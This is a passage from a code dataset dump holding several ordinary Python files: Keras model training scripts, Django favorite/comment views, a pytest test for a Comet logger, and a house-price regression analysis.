_message_placeholder(self):\n return self.app.config.versionwarning_message_placeholder\n\n @property\n def _default_admonition_type(self):\n return self.app.config.versionwarning_default_admonition_type\n\n @property\n def _current_doc_version_slug(self):\n return (\n os.environ.get('READTHEDOCS_VERSION', None) or\n self.app.config.versionwarning_project_version or\n self.app.config.version\n )\n\n @property\n def _latest_doc_version(self):\n if USE_READTHEDOCS_API:\n return self.api.newest_version()\n else:\n return Munch(\n url='.',\n slug=self._current_doc_version_slug,\n )\n\n def _get_message(self, version):\n return self.app.config.versionwarning_messages.get(\n version,\n self.app.config.versionwarning_default_message,\n )\n", "sub_path": "versionwarning/banner.py", "file_name": "banner.py", "file_ext": "py", "file_size_in_byte": 3171, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "docutils.nodes.warning", "line_number": 15, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 15, "usage_type": "name"}, {"api_name": "docutils.nodes.note", "line_number": 16, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 16, "usage_type": "name"}, {"api_name": "docutils.nodes.admonition", "line_number": 17, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 17, "usage_type": "name"}, {"api_name": "readthedocs.ReadTheDocsAPI", "line_number": 34, "usage_type": "call"}, {"api_name": "docutils.core.publish_doctree", "line_number": 61, "usage_type": "call"}, {"api_name": "docutils.core", "line_number": 61, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 86, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 86, "usage_type": "attribute"}, {"api_name": "munch.Munch", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "464543904", "text": "# -*- coding: utf-8 -*-\nfrom re import split\nimport numpy as np\nfrom numpy.lib import index_tricks\nfrom numpy.lib.financial import rate\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.models import Sequential, model_from_json\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.keras.backend import binary_crossentropy\nfrom tensorflow.python.keras.callbacks import History\nfrom tensorflow.python.keras.engine import input_layer\nfrom tensorflow.python.keras.layers.core import Flatten\nfrom sklearn import preprocessing\nos.chdir('Mycode/sotuken')\n\ndef data_shuffle(all): \n train,test = train_test_split(all,test_size=0.3)\n return train,test\n\nall = pd.read_csv(\"seikika2.csv\")\ntrain,test= data_shuffle(all)\n\nprint(train)\n'''\ndef highscore_tr():\n train = pd.read_csv(\"train90_1.csv\")\n return train\ntrain = highscore_tr()\n'''\ntrainexp = train[[\"mode\",\"realTemp\",\"realHumi\",\"setVol\"]].values\ntrainpur = train[[\"very comfortable(0)\",\"little comfortable(1)\",\"neither(2)\",\"little discomfort(3)\",\"veriy discomfort(4)\"]].values\nprint(trainexp)\n'trainexpを正規化'\n#trainexp = print(preprocessing.minmax_scale(trainexp,axis=1))\n#trainexp.to_csv(\"seikika.csv\")\n\n\n'モデル構築'\nmodel = Sequential([\nDense(50,activation=\"relu\",input_shape=(4,)),\nDense(20,activation='relu'),\nDense(5,activation=\"softmax\")\n])\nmodel.summary() #モデルの詳細\nadam = optimizers.Adam(lr=0.003)\nmodel.compile(optimizer=adam,\n loss='categorical_crossentropy',\n metrics=['accuracy'],\n )\n'学習実行'\nhistory = model.fit(trainexp,\n trainpur,\n batch_size=100,\n epochs=100\n )\n\n'予測'\ntest_exp = test[[\"mode\",\"realTemp\",\"realHumi\",\"setVol\"]].values\ntestpur = test[[\"very comfortable(0)\",\"little comfortable(1)\",\"neither(2)\",\"little discomfort(3)\",\"veriy discomfort(4)\"]].values\n\npre = model.predict(test_exp)\n#preclass = model.predict_classes(test_exp)\nprint(pre)\nprint(testpur)\n\n\nprint(history.history.keys()) #historyに格納されているキーの確認\n\n'学習曲線'\ndef learn_ploting(): \n plt.title(\"loss and accuracy\")\n plt.scatter(x=0,y=0,label=\"loss\")\n plt.scatter(x=0,y=0,label=\"accuracy\")\n plt.legend()\n plt.xlabel(\"epochs\")\n plt.ylabel(\"accuracy\")\n plt.ylabel(\"loss\")\n plt.plot(history.history[\"loss\"])\n plt.plot(history.history[\"accuracy\"])\n plt.show()\n\nlearn_ploting()\n\n", "sub_path": "Mycode/sotuken/sotuken03.py", "file_name": "sotuken03.py", "file_ext": "py", "file_size_in_byte": 2725, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.chdir", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}]} +{"seq_id": "471240300", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 20 17:52:02 2018\n\n@author: ashwin bhatt\n\"\"\"\n\nfrom __future__ import print_function\nimport keras\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.layers.recurrent import LSTM\nfrom keras import backend as K\nfrom keras import optimizers\n\n\n\n\n# the data, split between train and test sets\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nn_classes = 10\nn_classes = 10\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\nx_train = x_train.reshape(-1,28,28)\nx_test = x_test.reshape(-1,28,28)\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, n_classes)\ny_test = keras.utils.to_categorical(y_test, n_classes)\n\n#create rnn model\nmodel = Sequential()\nmodel.add(LSTM(units = 16,activation='relu',input_shape=(28,28)))\nmodel.add(Dense(n_classes))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer=keras.optimizers.RMSprop(lr=0.01),\n metrics=['accuracy'])\n\n\nmodel.summary\n\nmodel.fit(x_train,y_train,\n batch_size=100,epochs=20)\n\n\nscore = model.evaluate(x_test,y_test)\nprint('\\nTest loss:',score[0])\nprint('test accuracy:',score[1])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "keras lstm.py", "file_name": "keras lstm.py", "file_ext": "py", "file_size_in_byte": 1433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "keras.datasets.mnist.load_data", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.datasets.mnist", "line_number": 21, "usage_type": "name"}, {"api_name": "keras.utils.to_categorical", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 34, "usage_type": "attribute"}, {"api_name": "keras.utils.to_categorical", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 35, "usage_type": "attribute"}, {"api_name": "keras.models.Sequential", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 39, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 41, "usage_type": "call"}, {"api_name": "keras.optimizers.RMSprop", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 44, "usage_type": "attribute"}]} +{"seq_id": "536342751", "text": "from django.shortcuts import render\nfrom .forms import UserAskForm, UserCommentForm\nfrom django.http import JsonResponse\nfrom .models import UserLove, UserComment\nfrom orgs.models import OrgInfo, TeacherInfo\nfrom courses.models import CourseInfo\nfrom django.core.serializers import serialize\nfrom tools.decorators import login_decorator\n\n\n# Create your views here.\ndef user_ask(request):\n user_ask_form = UserAskForm(request.POST)\n if user_ask_form.is_valid():\n user_ask_form.save(commit=True)\n # name = user_ask_form.cleaned_data['name']\n # phone = user_ask_form.cleaned_data['phone']\n # course = user_ask_form.cleaned_data['course']\n # a = UserAsk()\n # a.name = name\n # a.phone = phone\n # a.course = course\n # a.save()\n return JsonResponse({'status': 'ok', 'msg': '咨询成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '咨询失败'})\n\n\n@login_decorator\ndef user_love(request):\n loveid = request.GET.get('loveid', '')\n lovetype = request.GET.get('lovetype', '')\n if loveid and lovetype:\n # 根据传递过来的收藏类型,判断是什么对象,根据传递过来的收藏id,判断收藏的是哪一个对象。\n obj = None\n if int(lovetype) == 1:\n obj = OrgInfo.objects.filter(id=int(loveid))[0]\n if int(lovetype) == 2:\n obj = CourseInfo.objects.filter(id=int(loveid))[0]\n if int(lovetype) == 3:\n obj = TeacherInfo.objects.filter(id=int(loveid))[0]\n\n # 如果收藏的id和type同时存在,那么我们首先要去到收藏表当中去查找有没有这个用户的这个收藏记录\n love = UserLove.objects.filter(love_id=int(loveid), love_type=int(lovetype), love_man=request.user)\n if love:\n # 如果本来已经存在收藏这个东西的记录,那么我们需要判断收藏的状态,如果收藏状态为真,代表之前收藏过,并且现在的页面上应显示的是取消收藏,代表着这次点击是为了取消收藏\n if love[0].love_status:\n love[0].love_status = False\n love[0].save()\n obj.love_num -= 1\n obj.save()\n return JsonResponse({'status': 'ok', 'msg': '收藏'})\n # 如果收藏状态为假,代表之前收藏过,并且又取消了收藏,并且现在的页面上应显示的是收藏,代表着这次点击是为了收藏\n else:\n love[0].love_status = True\n love[0].save()\n obj.love_num += 1\n obj.save()\n return JsonResponse({'status': 'ok', 'msg': '取消收藏'})\n else:\n # 如果之前没有收藏过这个东西,那么代表着表当中没有这个记录,所以,我们需要先创建这个记录对象,然后把这个记录的状态改为True\n a = UserLove()\n a.love_man = request.user\n a.love_id = int(loveid)\n a.love_type = int(lovetype)\n a.love_status = True\n a.save()\n obj.love_num += 1\n obj.save()\n return JsonResponse({'status': 'ok', 'msg': '取消收藏'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '收藏失败'})\n\n\ndef user_comment(request):\n user_comment_form = UserCommentForm(request.POST)\n if user_comment_form.is_valid():\n course = user_comment_form.cleaned_data['course']\n content = user_comment_form.cleaned_data['content']\n a = UserComment()\n a.comment_man = request.user\n a.comment_content = content\n a.comment_course_id = course\n a.save()\n\n # all_comments = UserComment.objects.filter(comment_course_id=course)\n #\n # all_comments = serialize('json',all_comments)\n #\n # return JsonResponse(all_comments,safe=False)\n return JsonResponse({'status': 'ok', 'msg': '评论成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '评论失败'})\n\n\ndef user_deletelove(request):\n loveid = request.GET.get('loveid', '')\n lovetype = request.GET.get('lovetype', '')\n if loveid and lovetype:\n love = UserLove.objects.filter(love_id=int(loveid), love_type=int(lovetype), love_man=request.user,\n love_status=True)\n if love:\n love[0].love_status = False\n love[0].save()\n return JsonResponse({'status': 'ok', 'msg': '取消成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '取消失败'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '取消失败'})\n", "sub_path": "GuLiEdu/apps/operations/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "forms.UserAskForm", "line_number": 13, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 24, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 26, "usage_type": "call"}, {"api_name": "orgs.models.OrgInfo.objects.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "orgs.models.OrgInfo.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "orgs.models.OrgInfo", "line_number": 37, "usage_type": "name"}, {"api_name": "courses.models.CourseInfo.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "courses.models.CourseInfo.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "courses.models.CourseInfo", "line_number": 39, "usage_type": "name"}, {"api_name": "orgs.models.TeacherInfo.objects.filter", "line_number": 41, "usage_type": "call"}, {"api_name": "orgs.models.TeacherInfo.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "orgs.models.TeacherInfo", "line_number": 41, "usage_type": "name"}, {"api_name": "models.UserLove.objects.filter", "line_number": 44, "usage_type": "call"}, {"api_name": "models.UserLove.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models.UserLove", "line_number": 44, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 59, "usage_type": "call"}, {"api_name": "models.UserLove", "line_number": 62, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 72, "usage_type": "call"}, {"api_name": "tools.decorators.login_decorator", "line_number": 29, "usage_type": "name"}, {"api_name": "forms.UserCommentForm", "line_number": 76, "usage_type": "call"}, {"api_name": "models.UserComment", "line_number": 80, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 91, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 93, "usage_type": "call"}, {"api_name": "models.UserLove.objects.filter", "line_number": 100, "usage_type": "call"}, {"api_name": "models.UserLove.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.UserLove", "line_number": 100, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 105, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 107, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 109, "usage_type": "call"}]} +{"seq_id": "605026960", "text": "from unittest.mock import patch\n\nimport pytest\n\nfrom pytorch_lightning.loggers import CometLogger\nfrom pytorch_lightning.utilities.exceptions import MisconfigurationException\n\n\ndef test_comet_logger_online():\n \"\"\"Test comet online with mocks.\"\"\"\n # Test api_key given\n with patch('pytorch_lightning.loggers.comet.CometExperiment') as comet:\n logger = CometLogger(\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n _ = logger.experiment\n\n comet.assert_called_once_with(\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n # Test both given\n with patch('pytorch_lightning.loggers.comet.CometExperiment') as comet:\n logger = CometLogger(\n save_dir='test',\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n _ = logger.experiment\n\n comet.assert_called_once_with(\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n # Test neither given\n with pytest.raises(MisconfigurationException):\n CometLogger(\n workspace='dummy-test',\n project_name='general'\n )\n\n # Test already exists\n with patch('pytorch_lightning.loggers.comet.CometExistingExperiment') as comet_existing:\n logger = CometLogger(\n experiment_key='test',\n experiment_name='experiment',\n api_key='key',\n workspace='dummy-test',\n project_name='general'\n )\n\n _ = logger.experiment\n\n comet_existing.assert_called_once_with(\n api_key='key',\n workspace='dummy-test',\n project_name='general',\n previous_experiment='test'\n )\n\n comet_existing().set_name.assert_called_once_with('experiment')\n\n with patch('pytorch_lightning.loggers.comet.API') as api:\n CometLogger(\n api_key='key',\n workspace='dummy-test',\n project_name='general',\n rest_api_key='rest'\n )\n\n api.assert_called_once_with('rest')\n", "sub_path": "tests/loggers/test_comet.py", "file_name": "test_comet.py", "file_ext": "py", "file_size_in_byte": 2197, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.mock.patch", "line_number": 12, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 28, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 45, "usage_type": "call"}, {"api_name": "pytorch_lightning.utilities.exceptions.MisconfigurationException", "line_number": 45, "usage_type": "argument"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 46, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 52, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 53, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 72, "usage_type": "call"}, {"api_name": "pytorch_lightning.loggers.CometLogger", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "134748082", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 18 07:08:30 2018\r\n\r\n@author: mpagrawa\r\n\"\"\"\r\n\r\n#import house_11112018 as parent\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport sqlalchemy as sql\r\nimport statsmodels.formula.api as sm\r\nimport scipy.stats as stats\r\n\r\nfrom sklearn import preprocessing\r\n\r\nfrom sqlalchemy import create_engine\r\nengine = create_engine('sqlite://', echo=False)\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly = PolynomialFeatures(2)\r\n\r\n#%matplotlib inline\r\nsns.set_style('whitegrid')\r\n\r\ndef StartOverDf():\r\n house = pd.read_csv('kc_house_data.csv', parse_dates=['date'])\r\n del house['id']\r\n del house['lat']\r\n del house['long']\r\n return house\r\n\r\ndef AdjustedRSquare(model,X,Y):\r\n YHat = model.predict(X)\r\n n,k = X.shape\r\n sse = np.sum(np.square(YHat-Y),axis=0)\r\n sst = np.sum(np.square(Y-np.mean(Y)),axis=0)\r\n R2 = 1- sse/sst\r\n adjR2 = R2-(1-R2)*(float(k)/(n-k-1))\r\n return adjR2\r\n\r\ndef BackwardElimination(X,y,sl):\r\n columnList = X.columns.tolist() \r\n for i in range(0, len(columnList)):\r\n regressor_OLS = sm.OLS(y, X[columnList]).fit()\r\n adjR2_before = regressor_OLS.rsquared_adj \r\n maxVar = max(regressor_OLS.pvalues) \r\n if maxVar > sl:\r\n ind = regressor_OLS.pvalues[regressor_OLS.pvalues == max(regressor_OLS.pvalues)].index[0]\r\n columnList_new = columnList.copy()\r\n columnList_new.remove(ind)\r\n temp_OLS = sm.OLS(y, X[columnList_new]).fit()\r\n adjR2_after = temp_OLS.rsquared_adj\r\n print('before', adjR2_before)\r\n print('after', adjR2_after, '\\n')\r\n if adjR2_before > adjR2_after:\r\n return columnList\r\n else:\r\n columnList.remove(ind) \r\n return columnList\r\n\r\ndef PolyFeatureNames(featureNames):\r\n # interaction features\r\n featureNames = ['intercept'] + featureNames \r\n polyFeatureNames = []; \r\n for i,x in enumerate(featureNames):\r\n for y in featureNames[i:]:\r\n if (x == 'intercept'):\r\n polyFeatureNames.append(y)\r\n elif (x==y):\r\n polyFeatureNames.append((y+'_Square'))\r\n else:\r\n polyFeatureNames.append((x+'_'+y))\r\n return polyFeatureNames\r\n\r\nfrom sklearn.model_selection import GridSearchCV\r\n#from sklearn.grid_search import GridSearchCV\r\nfrom sklearn.cross_validation import ShuffleSplit\r\nfrom sklearn.metrics import make_scorer\r\nfrom sklearn.metrics import r2_score\r\n\r\ndef performance_metric(y_true, y_predict):\r\n score = r2_score(y_true, y_predict)\r\n return score\r\n\r\n\r\ndef fit_model(X,y):\r\n cv_sets = ShuffleSplit(X.shape[0],n_iter=10,\r\n test_size=0.20,\r\n random_state=1234)\r\n ridgeModel = Ridge()\r\n params = {'alpha':list(range(0,5)),\r\n 'solver' : ('auto', \r\n 'svd', \r\n 'cholesky', \r\n 'lsqr', \r\n 'sparse_cg', \r\n 'sag', \r\n 'saga')}\r\n scoring_func = make_scorer(performance_metric)\r\n grid = GridSearchCV(ridgeModel,params,scoring_func,cv=cv_sets)\r\n grid = grid.fit(X,y)\r\n return grid.best_estimator_\r\n\r\nhouse = StartOverDf()\r\n#plt.figure(figsize=(15,10))\r\n#sns.heatmap(house.corr(), annot=True, cmap='coolwarm')\r\nmax_date = max(house.date)\r\nhouse['Age_sold'] = house['date'].apply(lambda x: ((max_date - x).days))\r\nhouse['House_Built_Age'] = 2015-house['yr_built']\r\nhouse['House_Renovated_Age'] = 2015-house['yr_renovated']\r\nhouse['Tot_Bathrooms'] = house.bathrooms * house.bedrooms\r\nhouse['Price_Sqft'] = house.price / house.sqft_living15\r\nhouse['Price_Sqft_lot'] = house.price / house.sqft_lot15\r\ndel(house['bathrooms'])\r\nhouse.at[house.index[house.bedrooms ==33],'bedrooms'] = 3\r\nhouse.at[house.index[house.bedrooms ==11],'bedrooms'] = 3\r\n\r\n\r\nhouse= pd.get_dummies(house, columns =['view'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['grade'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['zipcode'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['condition'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['floors'], drop_first=True)\r\nhouse= pd.get_dummies(house, columns =['bedrooms'], drop_first=True)\r\n# sqft_living and lot areas have changed even though house is not renovated\r\n# drop older coloumns considering 15 data as the latest and accurate\r\n\r\n\r\nX = house.drop(['price','date','sqft_living','sqft_lot','sqft_above','sqft_basement','yr_built','yr_renovated'], axis=1)\r\ny = house.price\r\n\r\n\r\n# Stats model\r\nX['intercept'] = 1\r\nres = BackwardElimination(X,y,0.05)\r\n\r\n#regressor_OLS = sm.OLS(y, X).fit()\r\n#regressor_OLS.summary()\r\n\r\n#regressor_OLS.pvalues\r\n#res.remove('intercept')\r\n\r\nXpoly = poly.fit_transform(X[res])\r\n#polyFeatureNames = PolyFeatureNames(X.columns.tolist())\r\npolyFeatureNames = PolyFeatureNames(res)\r\n#polyFeatureNames = PolyFeatureNames(['House_Renovated_Age','tot_bathrooms'])\r\n#Xpoly.shape\r\nXpolyDf = pd.DataFrame(Xpoly, columns=polyFeatureNames)\r\n#X = XpolyDf\r\n\r\n#zip_unique = list(set(X.zipcode))\r\n\r\n#from statsmodels.stats.multicomp import pairwise_tukeyhsd\r\n#output = pairwise_tukeyhsd(y,X.zipcode)\r\n#output.summary()\r\n#df = pd.DataFrame(output.summary())\r\n#df = pd.DataFrame(data=output._results_table.data[1:], columns=output._results_table.data[0])\r\n#df1 = df[df.reject == False]\r\n#output.plot_simultaneous()[0]\r\n\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nlm = LinearRegression()\r\nfrom sklearn.model_selection import train_test_split\r\n#X_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nX_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nlm.fit(X_train, y_train)\r\ncoefMetrics = pd.DataFrame(index=X_train.columns, data=lm.coef_)\r\nR2_train = lm.score(X_train, y_train)\r\nR2_test = lm.score(X_test, y_test)\r\ny_pred = lm.predict(X_test)\r\nadjR2_train = AdjustedRSquare(lm,X_train,y_train)\r\nadjR2_test = AdjustedRSquare(lm,X_test,y_test)\r\n\r\n\r\nfrom sklearn.linear_model import Lasso\r\nlm1 = Lasso(alpha=1, max_iter=5000)\r\nfrom sklearn import cross_validation as cv\r\n#X_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X,y, test_size=0.25,random_state=1234)\r\n#X_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nX_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nlm1.fit(X_train_L, y_train_L)\r\ncoefMetrics = pd.DataFrame(index=X_train_L.columns, data=lm.coef_)\r\nR2_train = lm1.score(X_train_L, y_train_L)\r\nR2_test = lm1.score(X_test_L, y_test_L)\r\ny_pred = lm1.predict(X_test_L)\r\nadjR2_train1 = AdjustedRSquare(lm1,X_train_L,y_train_L)\r\nadjR2_test1 = AdjustedRSquare(lm1,X_test_L,y_test_L)\r\n\r\n\r\nfrom sklearn.linear_model import Ridge\r\nlm1 = Ridge(alpha=1,max_iter=5000, solver='svd')\r\n#from sklearn.model_selection import cross_validate as cv\r\nfrom sklearn import cross_validation as cv\r\n#from sklearn import cross_validation as cv\r\n#X_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X,y, test_size=0.25,random_state=1234)\r\n#X_train, X_test, y_train, y_test = train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nX_train_L, X_test_L, y_train_L, y_test_L = cv.train_test_split(X[res], y, test_size=0.3, random_state=5)\r\nlm1.fit(X_train_L, y_train_L)\r\ncoefMetrics = pd.DataFrame(index=X_train_L.columns, data=lm.coef_)\r\nR2_train = lm1.score(X_train_L, y_train_L)\r\nR2_test = lm1.score(X_test_L, y_test_L)\r\ny_pred = lm1.predict(X_test_L)\r\nadjR2_train2 = AdjustedRSquare(lm1,X_train_L,y_train_L)\r\nadjR2_test2 = AdjustedRSquare(lm1,X_test_L,y_test_L)\r\n\r\n\r\n#best_estimate = fit_model(X_train,y_train)\r\n#best_estimate\r\n#Ridge(alpha=1, copy_X=True, fit_intercept=True, max_iter=None,\r\n# normalize=False, random_state=None, solver='svd', tol=0.001)\r\n#adjR2_train = 0.9439\r\n#adjR2_test = 0.9419\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "sub_path": "house_EDA_11112018.py", "file_name": "house_EDA_11112018.py", "file_ext": "py", "file_size_in_byte": 8094, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 24, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 40, "usage_type": "call"}, {"api_name": "statsmodels.formula.api.OLS", "line_number": 48, "usage_type": "call"}, {"api_name": "statsmodels.formula.api", "line_number": 48, "usage_type": "name"}, {"api_name": "statsmodels.formula.api.OLS", "line_number": 55, "usage_type": "call"}, {"api_name": "statsmodels.formula.api", "line_number": 55, "usage_type": "name"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.ShuffleSplit", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.metrics.make_scorer", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 128, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 168, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 173, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 182, 